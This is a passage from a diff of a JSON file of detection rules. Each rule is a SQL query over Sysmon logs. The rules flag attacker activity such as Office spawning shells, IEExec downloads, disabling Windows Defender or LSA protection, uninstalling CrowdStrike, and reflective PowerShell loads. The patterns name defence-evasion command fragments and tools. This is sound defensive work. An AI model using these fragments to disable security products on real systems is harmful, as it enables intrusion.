'%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "title": "Suspicious Microsoft Office Child Process", + "id": 
"438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' 
ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml" + }, + { + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "status": "experimental", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on 
the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.010" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their 
tools and activities by uninstalling Crowdstrike Falcon", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "title": "Potential WinAPI Calls Via CommandLine", + "id": 
"ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "status": "experimental", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE 
'%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" - ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" - }, - { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - 
"description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1055" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE 
'%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", - "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "status": "test", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might leverage the same command line for debugging or other purposes. 
